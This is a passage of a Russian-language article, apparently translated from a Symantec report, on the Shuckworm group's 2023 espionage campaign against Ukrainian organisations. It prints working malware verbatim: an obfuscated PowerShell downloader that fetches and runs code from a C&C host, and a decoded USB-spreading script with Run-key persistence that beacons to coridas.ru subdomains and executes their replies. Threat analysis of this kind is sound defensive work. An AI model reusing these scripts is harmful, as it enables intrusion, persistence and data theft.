\u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f C&amp;C \u0437\u0430\u0440\u0430\u043d\u0435\u0435 \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u044b. \u042d\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043c\u043e\u0447\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e C&amp;C-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c Shuckworm.<\/p>\n<p>Symantec \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0430, \u0447\u0442\u043e, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, Giddome, \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043f\u043e\u0445\u0438\u0449\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0441\u043e\u0431\u043e\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 Shuckworm, \u0431\u044b\u043b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442 \u0432 \u0441\u0435\u0442\u044f\u0445 \u0436\u0435\u0440\u0442\u0432 \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0438 \u0443\u0442\u0435\u0447\u043a\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445 \u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>\u0422\u0438\u043f\u0438\u0447\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0430\u0442\u0430\u043a<\/strong><\/p>\n<p>\u041d\u0438\u0436\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0442\u0438\u043f\u0438\u0447\u043d\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0430\u0442\u0430\u043a, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u0430\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0436\u0435\u0440\u0442\u0432\u044b, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0447\u0435\u0440\u0432\u0435\u043c Shuckworm \u0432 \u0445\u043e\u0434\u0435 \u044d\u0442\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438.<\/p>\n<p>\u0412 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0430\u0442\u0430\u043a \u043f\u0435\u0440\u0432\u044b\u043c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u043e \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 RAR, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.<\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u043e\u0441\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0441 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432:<\/p>\n<p>&#171;CSIDL_SYSTEM\\cmd.exe&#187; \/c start \/min &#171;&#187; powershell -w hidden &#171;$gt=&#8217;\/get.&#8217;+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+=&#8217;.vafikgo.&#8217;;$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr=&#8217;htt&#8217;+&#8217;ps:\/\/&#8217;+$addr+$gt;$text=$client.downloadstring($faddr);iex $text&#187;<\/p>\n<p>\u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Symantec \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e Shuckworm \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445 PowerShell. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u044d\u0442\u043e \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u043e\u0431\u043e\u0439\u0442\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438.<\/p>\n<p>\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Shuckworm \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445 PowerShell, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f: \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f \u043f\u043e \u0430\u043f\u0440\u0435\u043b\u044c 2023 \u0433\u043e\u0434\u0430 \u0435\u0436\u0435\u043c\u0435\u0441\u044f\u0447\u043d\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u043e\u0441\u044c \u0434\u043e 25 \u043d\u043e\u0432\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u044d\u0442\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0431\u044b\u043b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d VBS-\u0441\u043a\u0440\u0438\u043f\u0442, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0441\u043e\u0431\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 Pterodo \u043e\u0442 Shuckworm:<\/p>\n<ul>\n<li>CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow \/\/e:vbscript \/\/b \/kmc \/fff \/cfm \/sc4model<\/li>\n<\/ul>\n<p>\u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e Symantec \u0443\u0432\u0438\u0434\u0435\u043b\u0438, \u0447\u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0445\u043e\u0436\u0438\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432. \u041d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0435\u0439\u0441\u044f \u0434\u043b\u044f \u044d\u0442\u0438\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u043a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0445\u0440\u0430\u043d\u0438\u043b\u043e\u0441\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 \u0438\u043b\u0438 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c\u0438 \u0432\u0435\u0434\u043e\u043c\u0441\u0442\u0432\u0430\u043c\u0438.<\/p>\n<p>\u041d\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b\u0430\u0441\u044c \u0438\u0437 \u0444\u0430\u0439\u043b\u0430 (foto.safe), \u0441\u0431\u0440\u043e\u0448\u0435\u043d\u043d\u043e\u0433\u043e \u0441 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0433\u043e USB-\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044f, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435. Symantec \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0443\u0442\u0435\u0439 \u043a \u0444\u0430\u0439\u043b\u0430\u043c, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0445 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043b \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0439 USB-\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, &#171;usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c&#187; \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u043a\u0430\u043a &#171;usb-drive&#187;.<\/p>\n<p>\u0424\u0430\u0439\u043b foto.safe \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 Base64-\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442.<\/p>\n<p>\u0412 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u043e\u043d \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n<p><em>fUNCtIon sET-lnK ($chILd) {<\/em><\/p>\n<p><em>$nAMetxt = &#171;foto.sAfe&#187;.TolowER();<\/em><\/p>\n<p><em>$NAmE = (&#171;\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442&#187;, &#171;\u041a\u041e\u0420\u0417\u0438\u041d\u0410&#187;, &#171;\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e&#187; | GeT-rAnDOm).ToUPPeR();<\/em><\/p>\n<p><em>$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;<\/em><\/p>\n<p><em>$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +&#187;\\$nAMe.LNK&#187;);<\/em><\/p>\n<p><em>$shoRtCuT.iConloCaTiON = &#171;C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3&#187;;<\/em><\/p>\n<p><em>$SHOrTcUT.TArGetpAth = &#171;c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE&#187;.ToLoweR();<\/em><\/p>\n<p><em>$text = &#171;-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt | OUT-STrIng))&#187;.TOlower();<\/em><\/p>\n<p><em>$sHORTCUT.ArGUMEnTs = $tExt;<\/em><\/p>\n<p><em>$sHortCUT.saVE();<\/em><\/p>\n<p><em>$mYfIlE= $chIlD+&#187;\\$naMeTXT&#187;<\/em><\/p>\n<p><em>cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE<\/em><\/p>\n<p><em>$FIlE=GEt-ITEM $mYfiLE -forCe<\/em><\/p>\n<p><em>$FiLe.ATtRiButes=&#8217;hiDDEN&#8217;<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>}<\/em><\/p>\n<p><em>Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir&#8217;\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE&#8217;;<\/em><\/p>\n<p><em>coPy-item .\\&#187;fOtO.safe&#187; -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp<\/em><\/p>\n<p><em>WHile($CoUNT -lE 2){<\/em><\/p>\n<p><em>$urLs = &#8216;hTTP:\/\/&#8217;+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+&#8217;.cOriDAS.Ru&#8217;) +&#8217;\/slEEP.Php&#8217;;<\/em><\/p>\n<p><em>iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),&#187;)<\/em><\/p>\n<p><em>$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer &#171;drIvETYPe=&#8217;2&#8242;&#187;;<\/em><\/p>\n<p><em>$Drive.naMe | FOreaCH-oBJecT{<\/em><\/p>\n<p><em>$CHiLdS = GET-ChilDITem $drivE.nAMe<\/em><\/p>\n<p><em>foReach($cHilDs IN $chiLDs)<\/em><\/p>\n<p><em>{<\/em><\/p>\n<p><em>if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )<\/em><\/p>\n<p><em>{<\/em><\/p>\n<p><em>sET-lnk $chILds.fUlLName<\/em><\/p>\n<p><em>}}<\/em><\/p>\n<p><em>IF(($dRIVe.CapaCITY &#8212; $DriVe.fREeSPACE) -Gt 1000000){<\/em><\/p>\n<p><em>SEt-lNK $DRivE.name<\/em><\/p>\n<p><em>}}<\/em><\/p>\n<p><em>STArt-SLEeP -S 300;<\/em><\/p>\n<p><em>}<\/em><\/p>\n<p>\u042d\u0442\u043e\u0442 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 PowerShell \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0431\u044f \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u044f\u0440\u043b\u044b\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0441\u044b\u043b\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 PowerShell. Symantec \u0432\u044b\u044f\u0432\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u044d\u0442\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0438\u043d\u0434\u0438\u043a\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b.<\/p>\n<p><strong>\u0416\u0435\u0440\u0442\u0432\u044b<\/strong><\/p>\n<p>\u041e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u044b\u0445 \u0446\u0435\u043b\u0435\u0439 \u044d\u0442\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0432\u043e\u0435\u043d\u043d\u044b\u0435, \u0441\u0438\u043b\u043e\u0432\u044b\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0438 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0438\u043b\u0438 \u0441\u0432\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445, \u0441\u0443\u0434\u044f \u043f\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f\u043c \u0444\u0430\u0439\u043b\u043e\u0432, \u0441\u0435\u043a\u0440\u0435\u0442\u043d\u0443\u044e \u0432\u043e\u0435\u043d\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043a\u0438\u043d\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0432\u043e\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439.<\/p>\n<p>\u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u044d\u0442\u0438\u0445 \u0430\u0442\u0430\u043a \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0432 \u0444\u0435\u0432\u0440\u0430\u043b\u0435-\u043c\u0430\u0440\u0442\u0435 2023 \u0433\u043e\u0434\u0430, \u043f\u0440\u0438\u0447\u0435\u043c \u043d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445-\u0436\u0435\u0440\u0442\u0432\u0430\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u043b\u0438 \u0441\u0432\u043e\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0432\u043f\u043b\u043e\u0442\u044c \u0434\u043e \u043c\u0430\u044f. \u0421\u0435\u043a\u0442\u043e\u0440 \u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u0441\u0442\u0430\u0432\u0448\u0438\u0445 \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u043c \u0430\u0442\u0430\u043a\u0438, \u043c\u043e\u0433\u043b\u0438 \u0434\u0430\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u043e\u0431\u044a\u0435\u043c\u0430\u043c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u0412 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445 \u0438\u043c\u0435\u043b\u0438\u0441\u044c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u043e\u0442\u0434\u0435\u043b\u043e\u0432 \u043a\u0430\u0434\u0440\u043e\u0432 \u044d\u0442\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u0447\u0442\u043e \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u043e \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043d\u043e\u0439 \u0431\u044b\u043b\u0430, \u0432 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u043b\u0438\u0446\u0430\u0445, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445.<\/p>\n<p>\u042d\u0442\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e Shuckworm \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0443\u043f\u043e\u0440\u043d\u043e \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0423\u043a\u0440\u0430\u0438\u043d\u0443. \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u044b, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u043c \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0443\u0434\u0435\u043b\u044f\u0442\u044c \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043d\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u0432\u0430\u0436\u043d\u044b\u043c \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0446\u0435\u043b\u044f\u043c, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u043d\u0430\u0439\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043c\u043e\u0447\u044c \u0432 \u0438\u0445 \u0432\u043e\u0435\u043d\u043d\u044b\u0445 